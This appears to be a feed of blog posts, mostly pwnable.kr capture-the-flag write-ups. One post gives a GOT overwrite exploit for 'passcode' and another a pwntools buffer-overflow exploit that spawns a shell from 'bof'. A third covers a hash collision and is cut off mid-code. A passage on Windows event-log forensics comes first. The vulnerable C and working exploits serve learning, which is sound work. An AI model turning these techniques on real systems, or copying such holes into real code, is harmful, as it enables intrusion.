hole of logs.</p> <p>You should have a general idea of the system you are in, the amount and levels of users, a potential time of infection and which user was breached. The scheduled tasks found are persistence. Check this files as well as the other files in that directory to answer further questions. You have a potential: what, when and how.</p> <p>You can look into logs with <a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1">Get-EventLogs</a> (check that documentation, it rocks) and the information you gathered so far. I did the exercise again and I found it really hard to get there again without notes. I had to redo the entire thought process and it was quite painful. Especially as the first time, I got lucky and the second I got lost in the rabbit hole.</p> <p>From my beginner understanding, you should look for a specific pattern with your first clues and not just "something suspicious". Those are simple exercises and it's already easy to get lost in there.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="c"># Check the available logs</span><span class="w"> </span><span class="n">Get-Eventlogs</span><span class="w"> </span><span class="nt">-List</span><span class="w"> </span><span class="n">Get-EventLog</span><span class="w"> </span><span class="nt">-LogName</span><span class="w"> </span><span class="s2">"Security"</span><span class="w"> </span><span class="nt">-After</span><span class="w"> </span><span class="s2">"MM/DD/YYYY HH:MM:SS"</span><span class="w"> </span><span class="nt">-Before</span><span class="w"> </span><span class="s2">"MM/DD/YYYY HH:MM:SS"</span><span class="w"> </span><span class="nt">-Message</span><span class="w"> </span><span class="s2">"*Special*"</span><span class="w"> </span><span class="n">Get-EventLog</span><span class="w"> </span><span class="nt">-LogName</span><span class="w"> </span><span class="s2">"Security"</span><span class="w"> </span><span class="nt">-After</span><span class="w"> </span><span class="s2">"MM/DD/YYYY HH:MM:SS"</span><span class="w"> </span><span class="nt">-Before</span><span class="w"> </span><span class="s2">"MM/DD/YYYY HH:MM:SS"</span><span class="w"> </span><span class="nt">-InstanceId</span><span class="w"> </span><span class="nx">4672</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Format-List</span><span class="w"> </span></code></pre> </div> <p>Event ID 4672 is: <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672">special privileges assigned to new logon</a>.</p> <p>For network, check the host file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-Content</span><span class="w"> </span><span class="nv">$</span><span class="nn">env</span><span class="p">:</span><span class="nv">SystemRoot</span><span class="nx">\System32\Drivers\etc\hosts</span><span class="w"> </span></code></pre> </div> <p>You can look with <code>netsh</code> and <code>netstat</code> for more information, but here it isn't useful so I won't get more into those.</p> <h2> Registry keys </h2> <p>The <a href="https://en.wikipedia.org/wiki/Windows_Registry">Windows Registry</a> is a hierarchical database of system configuration. You will find there "keys" that set up the configuration. As here there is a user compromise, you might try to look for "HKCU" (<code>HKEY_CURRENT_USER</code>) for modifications.</p> <p>You can filter the events like to those keys with the Process Monitor.</p> <h2> Windows Management Instrumentation (WMI) </h2> <p>WMI "consists of a set of extensions to the Windows Driver Model that provides an operating system interface through which instrumented components provide information and notification." (<a href="https://en.wikipedia.org/wiki/Windows_Management_Instrumentation">Wikipedia</a>)</p> <p>I am so far not really familiar with those. But you can monitor those processes with <a href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/tracing-wmi-activity">this</a> and <a href="https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Your+WMI+Logs/25012/">that</a>.</p> <p>And for these exercises it should do the trick.</p> <h2> First stop </h2> <p>Ok, so far, you've conducted most of the investigation and I think those resources will help you answer the majority of questions.</p> <p>For the Yara and Loki questions, you might want to refer to the <a href="https://tryhackme.com/room/yara">Yara Room</a>. It isn't too hard and most of the information are there.</p> <p>I tried to understand each of those tools or at least, feel comfortable in searching and working with those. I will be looking for automation scripts or write my own in the future.</p> <p>I hope you enjoyed these notes and I'll get to the 3rd box right away!</p> security chris Fri, 19 Feb 2021 16:19:40 +0000 https://dev.to/evilcel3ri/pwnable-kr-passcode-write-up-36gj https://dev.to/evilcel3ri/pwnable-kr-passcode-write-up-36gj <h1> Finding the problem </h1> <p>First let's look at the code that we have.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Toddler's Secure Login System 1.0 beta.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">welcome</span><span class="p">();</span> <span class="n">login</span><span class="p">();</span> <span class="c1">// something after login...</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Now I can safely trust you that you have credential :)</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>The <code>main()</code> function will call two other functions: <code>welcome()</code> and <code>login()</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="kt">void</span> <span class="nf">welcome</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">100</span><span class="p">];</span> <span class="n">printf</span><span class="p">(</span><span class="s">"enter you name : "</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">"%100s"</span><span class="p">,</span> <span class="n">name</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Welcome %s!</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">name</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p><code>welcome()</code> will get your name in a 100 bytes buffer and reprint it.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="kt">void</span> <span class="nf">login</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">passcode1</span><span class="p">;</span> <span class="kt">int</span> <span class="n">passcode2</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"enter passcode1 : "</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">"%d"</span><span class="p">,</span> <span class="n">passcode1</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">stdin</span><span class="p">);</span> <span class="c1">// ha! mommy told me that 32bit is vulnerable to bruteforcing :)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"enter passcode2 : "</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">"%d"</span><span class="p">,</span> <span class="n">passcode2</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"checking...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">passcode1</span> <span class="o">==</span> <span class="mi">338150</span> <span class="o">&amp;&amp;</span> <span class="n">passcode2</span> <span class="o">==</span> <span class="mi">13371337</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Login OK!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">system</span><span class="p">(</span><span class="s">"/bin/cat flag"</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Login Failed!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p><code>login()</code> will ask you to enter two passcodes and if those are good, will display the flag.</p> <p>When testing the application, we get a segmentation fault when test is called.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--cJSK5Q4e--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g4yrs8irb5pgapzogmil.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--cJSK5Q4e--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g4yrs8irb5pgapzogmil.png" alt="Simple test and a segfault"></a></p> <p>So there seems to be something wrong with the line:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="k">if</span> <span class="p">(</span><span class="n">passcode1</span> <span class="o">==</span> <span class="mi">338150</span> <span class="o">&amp;&amp;</span> <span class="n">passcode2</span> <span class="o">==</span> <span class="mi">13371337</span><span class="p">)</span> </code></pre> </div> <p>When opening the code in my Neovim, I also have a warning on the <code>scanf</code> lines for <code>login()</code> that the format specifies <code>int *</code> but the argument is <code>int</code>. This means that instead of calling the address and getting the value from it, the code passes <code>passcode1</code> and <code>passcode2</code> as addresses. Which could be the reason of our segmentation fault.</p> <h1> Debugging the binary </h1> <p>Let's open our debugger:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>rz <span class="nt">-d</span> passcode </code></pre> </div> <p>Let's look at <code>login()</code>:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--83sv7BGk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zwd5v1easgewoa5xardx.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--83sv7BGk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zwd5v1easgewoa5xardx.png" alt="Assembly for the login function"></a></p> <p>We can see that the <code>passcode1</code> and <code>passcode2</code> are stored int32 variables. But the lines <code>cmp dword [var_10h], 0x528e6</code> and <code>cmp dword [var_ch], 0xcc07c9</code> will compare the addresses and not the value.</p> <p>Now let's look at <code>welcome()</code>:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5hmKU7Y_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sls1z0cd53fletladj99.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5hmKU7Y_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sls1z0cd53fletladj99.png" alt="Assembly for the welcome function"></a></p> <p>It is possible to see that on how the values are stored. In <code>welcome()</code>, the name you entered is stored in <code>var_70h</code> which is then called with <code>lea</code>.</p> <p>In <code>login()</code>, no signs of <code>lea</code> but the variables are directly called with <code>mov</code>. So what's the difference? <code>lea</code> stands for "load effective address" while <code>mov</code> will only move an address to a register. This corroborates our theory that the variables are not seen as variables with a pointer but as addresses which leads us to the bug. Indeed, the code tries to load the address <code>passcode1</code> and <code>passcode2</code> which obviously do not exist.</p> <h1> Exploit </h1> <p>How could we have access to the memory to run malicious payload? My first idea would be to put the payload when we are prompted with the name. But this variable is not called in <code>login()</code> which prevents us to get to that section. However, there is the <code>fflush()</code> command in <code>login()</code>. <code>fflush()</code> is a imported function, that means that it is loaded when the binary is started. This means that maybe we could hijack the code here (See <a href="https://github.com/Naetw/CTF-pwn-tips">this</a>) and overwrite with our own payload. It would also work as <code>fflush()</code> has a <code>jmp</code> instruction.</p> <p>So something like:</p> <ul> <li>Getting at the end of the buffer</li> <li>Setting the address of fflush to get the <code>jmp</code> (0x804a004) and getting the control or EIP.</li> <li> <code>jmp</code> to the system call printing the flag (0x080485ea)</li> </ul> <p>I spent some time tricking the formats around until it worked. I am not sure why the second address must be in numerical and not hex, but eh... It worked. Also, it's important to have the second reception call as <code>recvall()</code> and not <code>recvline()</code> and the output we want is later on in the process. I spent days reviewing my exploit code and forgetting about that part. </p> <p>So here is the local exploit code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">arch</span><span class="o">=</span><span class="s">"i386"</span><span class="p">,</span> <span class="n">os</span><span class="o">=</span><span class="s">"linux"</span><span class="p">)</span> <span class="n">e</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./passcode"</span><span class="p">)</span> <span class="n">name</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">96</span> <span class="n">name</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x804a004</span><span class="p">)</span> <span class="n">name</span> <span class="o">+=</span> <span class="nb">str</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="mh">0x080485d7</span><span class="p">))</span> <span class="n">p</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">process</span><span class="p">(</span><span class="n">level</span><span class="o">=</span><span class="s">"error"</span><span class="p">)</span> <span class="c1"># header </span><span class="k">print</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">())</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">name</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvall</span><span class="p">())</span> </code></pre> </div> <p>If you look online there are other exploitation solutions, notably one as a oneliner. But it only works with Python2 for some reason. I couldn't understand why. If you know about it, let me know in the comments!</p> security writeup ctf chris Thu, 04 Feb 2021 14:44:32 +0000 https://dev.to/evilcel3ri/pwnable-kr-bof-write-up-with-rizin-and-pwntools-313f https://dev.to/evilcel3ri/pwnable-kr-bof-write-up-with-rizin-and-pwntools-313f <p>This was such as cool challenge to practice reading Assembly!</p> <p>Generally speaking, this challenge is a bit different that the usual beginner buffer overflow challenge as there a some tricks present. </p> <p>For example, the binary has PIE and canaries enabled, so you'd think a buffer overflow wouldn't be possible. That's where you're wrong kid! (I was so wrong).</p> <p>The approach is based on 3 steps:</p> <ol> <li>identify the vulnerable function</li> <li>identify the buffer</li> <li>write the exploit</li> </ol> <h1> The code </h1> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; </span><span class="kt">void</span> <span class="nf">func</span><span class="p">(</span><span class="kt">int</span> <span class="n">key</span><span class="p">){</span> <span class="kt">char</span> <span class="n">overflowme</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="n">printf</span><span class="p">(</span><span class="s">"overflow me : "</span><span class="p">);</span> <span class="n">gets</span><span class="p">(</span><span class="n">overflowme</span><span class="p">);</span> <span class="c1">// smash me!</span> <span class="k">if</span><span class="p">(</span><span class="n">key</span> <span class="o">==</span> <span class="mh">0xcafebabe</span><span class="p">){</span> <span class="n">system</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span><span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Nah..</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[]){</span> <span class="n">func</span><span class="p">(</span><span class="mh">0xdeadbeef</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>It's pretty obvious what we should do: </p> <ul> <li>function <code>func</code> is called with the <code>0xdeadbeef</code> argument.</li> <li>if the argument is equal to <code>0xcafebabe</code>, it will unlock a shell. Otherwise, it will just tell you "Nah..".</li> </ul> <h1> Getting into the code </h1> <p>Let's check the code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>~ checksec bof Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled </code></pre> </div> <p>(<code>checksec</code> is part of the <a href="https://docs.pwntools.com/en/stable/">pwntools</a> suite)</p> <p>Checking the imports with <code>rz-bin -i bof</code> gives us this result:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[Imports] nth vaddr bind type lib name ――――――――――――――――――――――――――――――――――――― 1 0x000004c0 GLOBAL FUNC gets 2 0x000004d0 GLOBAL FUNC __stack_chk_fail 3 0x000004e0 WEAK FUNC __cxa_finalize 4 0x000004f0 GLOBAL FUNC puts 5 0x00000500 GLOBAL FUNC system 6 0x00000510 WEAK NOTYPE __gmon_start__ 7 0x00000520 GLOBAL FUNC __libc_start_main 8 0x00000000 WEAK NOTYPE _Jv_RegisterClasses </code></pre> </div> <p>So we know already there is the <code>gets</code> function that is usually the culprit in buffer overflow attacks but that there is also <code>stack_chk_fail</code> so we cannot smash the stack like we want as it will be blocked by this failsafe.</p> <p>Let's open that with <a href="https://book.rizin.re/"><code>rizin</code></a>: <code>rizin -A bof</code> (with full analysis) and get all functions:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hCnElPgC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/eog2f1zdgjdhhfsiev37.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hCnElPgC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/eog2f1zdgjdhhfsiev37.png" alt="all functions"></a></p> <p>Then disassemble <code>main()</code> and <code>func()</code>:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--DhSG5dAG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/yp75ysj2rdw94ejiw1k0.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--DhSG5dAG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/yp75ysj2rdw94ejiw1k0.png" alt="disassemble main and func"></a></p> <p>Nothing really new, let's try to run that binary. Without leaving <code>rizin</code>, run <code>ood</code> to relaunch in debug and let's add a break point just at the <code>var = dword [arg_8h] - 0xcafebabe</code> instruction with <code>db addr</code> (the address might change on your computer).</p> <p>Now, run <code>dc</code> to start the debugging process.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--R3rsISAk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/yuur7iu5dm0938dxgod9.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--R3rsISAk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/yuur7iu5dm0938dxgod9.png" alt="hitting breakpoint"></a></p> <p>Now let's check the registers with <code>drr</code>:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--B5KAROO2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/4wiocmyd9n91f2q9xxvb.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--B5KAROO2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/4wiocmyd9n91f2q9xxvb.png" alt="registers"></a></p> <p>So here, <code>eax</code> has <code>pouet</code> as a value (what we entered) and <code>esp</code> points to <code>eax</code>. </p> <p><code>0xcafebabe</code> will be compared to the argument of the function (<code>0xdeadbeef</code>) and if it's true, then we'll get the <code>system</code> call. But it's impossible so far as the argument is already set.</p> <p>Allowing us to write something is just useful for the exercise not the code itself.</p> <p>So if we manage to overwrite <code>0xdeadbeef</code> and replace it by <code>0xcafebabe</code> we'll get access to the system call. </p> <p><code>0xdeadbeef</code> is locate in <code>ebp +8</code>, let's check that out:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--mmABWBkq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/wbhnsslrt4kp4awgj3t4.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--mmABWBkq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/wbhnsslrt4kp4awgj3t4.png" alt="xw 4 @ ebp+8"></a></p> <p>And <code>eax</code>:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--in2PosKk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/cuwyu108sr0d0w779jlf.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--in2PosKk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/cuwyu108sr0d0w779jlf.png" alt="xw 4 @ eax"></a></p> <p>We have now two memory addresses: <code>0xff8e9c5c</code> and <code>0xff8e9c90</code> that are not too far from each other. To know the distance, let's calculate it:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--6GWlX31L--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/7vw3zosb48ak07v9oqvy.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--6GWlX31L--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/7vw3zosb48ak07v9oqvy.png" alt="?w addr1-addr2"></a></p> <blockquote> <p><code>?w</code> will show what's in an address. I found some tutorial using <code>?X</code> but that didn't make sense to me. To see the help of those commands use <code>???</code>.</p> </blockquote> <p>So the difference between the two addresses is 52 bytes. That'd be our buffer. </p> <h1> Exploit! </h1> <p>Using <code>pwntools</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">arch</span><span class="o">=</span><span class="s">"i386"</span><span class="p">,</span> <span class="n">os</span><span class="o">=</span><span class="s">"linux"</span><span class="p">)</span> <span class="n">e</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./bof"</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">52</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0xcafebabe</span><span class="p">,</span> <span class="n">endian</span><span class="o">=</span><span class="s">"little"</span><span class="p">)</span> <span class="n">p</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">process</span><span class="p">(</span><span class="n">level</span><span class="o">=</span><span class="s">"error"</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="c1"># overflow me: </span><span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre> </div> <p>I found a lot of cool new techniques for pwntools <a href="https://tc.gts3.org/cs6265/2019/tut/tut03-02-pwntools.html">here</a>.</p> <p>And that's it! It works locally and you'll have to modify the code for the remote exploit yourself, but it isn't too hard, don't worry!</p> ctf security cybersecurity chris Wed, 03 Feb 2021 21:37:16 +0000 https://dev.to/evilcel3ri/pwnable-kr-collusion-write-up-2joh https://dev.to/evilcel3ri/pwnable-kr-collusion-write-up-2joh <p>This a fun challenge that is good to practice debugging and reading C code (which I don't really know). </p> <p>A collusion is giving a message that has the same signature than your encoded password. Like your password is saved in an encoded way in a database with a hashing function X, when you log in to the service, you send your password which is hashed to X and that is checked with the database. If you give directly the hash Y that is equal to X, then you managed to log in without finding the password. For example, MD5 is vulnerable to it (other ciphers too). It's due to the limitations of the calculation of the hash (I think).</p> <p>So the main code is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;string.h&gt; </span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">hashcode</span> <span class="o">=</span> <span class="mh">0x21DD09EC</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">check_password</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">p</span><span class="p">){</span> <span class="kt">int</span><span class="o">*</span> <span class="n">ip</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">p</span><span class="p">;</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="kt">int</span> <span class="n">res</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="mi">5</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">){</span> <span class="n">res</span> <span class="o">+=</span> <span class="n">ip</span><span class="p">[</span><span class="n">i</span><span class="p">];</span> <span class="n">printf</span><span class="p">(</span><span class="n">res</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="n">res</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[]){</span> <span class="k">if</span><span class="p">(</span><span class="n">argc</span><span class="o">&lt;</span><span class="mi">2</span><span class="p">){</span> <span class="n">printf</span><span class="p">(</span><span class="s">"usage : %s [passcode]</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">!=</span> <span class="mi">20</span><span class="p">){</span> <span class="n">printf</span><span class="p">(</span><span class="s">"passcode length should be 20 bytes</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="n">hashcode</span> <span class="o">==</span> <span class="n">check_password</span><span class="p">(</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="p">)){</span> <span class="n">system</span><span class="p">(</span><span class="s">"/bin/cat flag"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="n">printf</span><span class="p">(</span><span class="s">"wrong passcode.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>From here, there are a couple of interesting sections.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">hashcode</span> <span class="o">=</span> <span class="mh">0x21DD09EC</span><span class="p">;</span> </code></pre> </div> <p>This section defines a global variable hashcode. We'll get back to it later.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">check_password</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">p</span><span class="p">){</span> <span class="kt">int</span><span class="o">*</span> <span class="n">ip</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">p</span><span class="p">;</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="kt">int</span> <span class="n">res</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="mi">5</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">){</span> <span class="n">res</span> <span class="o">+=</span> <span class="n">ip</span><span class="p">[</span><span class="n">i</span><span class="p">];</span> <span class="n">printf</span><span class="p">(</span><span class="n">res</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="n">res</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>This function will get a character (i.e. a string) and then cast it into a vector (i.e. an array). That's the <code>int* ip = (int*)p;</code> section. You should definitely <a href="https://www.quora.com/What-does-int-p-mean">read more</a> because it's quite central to the work here. </p> <p>Then, the loop will iterate over the vector and get all the values of <code>ip</code> and sum them to return the result. </p> <p>After that, the <code>main()</code> function:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[]){</span> <span class="k">if</span><span class="p">(</span><span class="n">argc</span><span class="o">&lt;</span><span class="mi">2</span><span class="p">){</span> <span class="n">printf</span><span class="p">(</span><span class="s">"usage : %s [passcode]</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">!=</span> <span 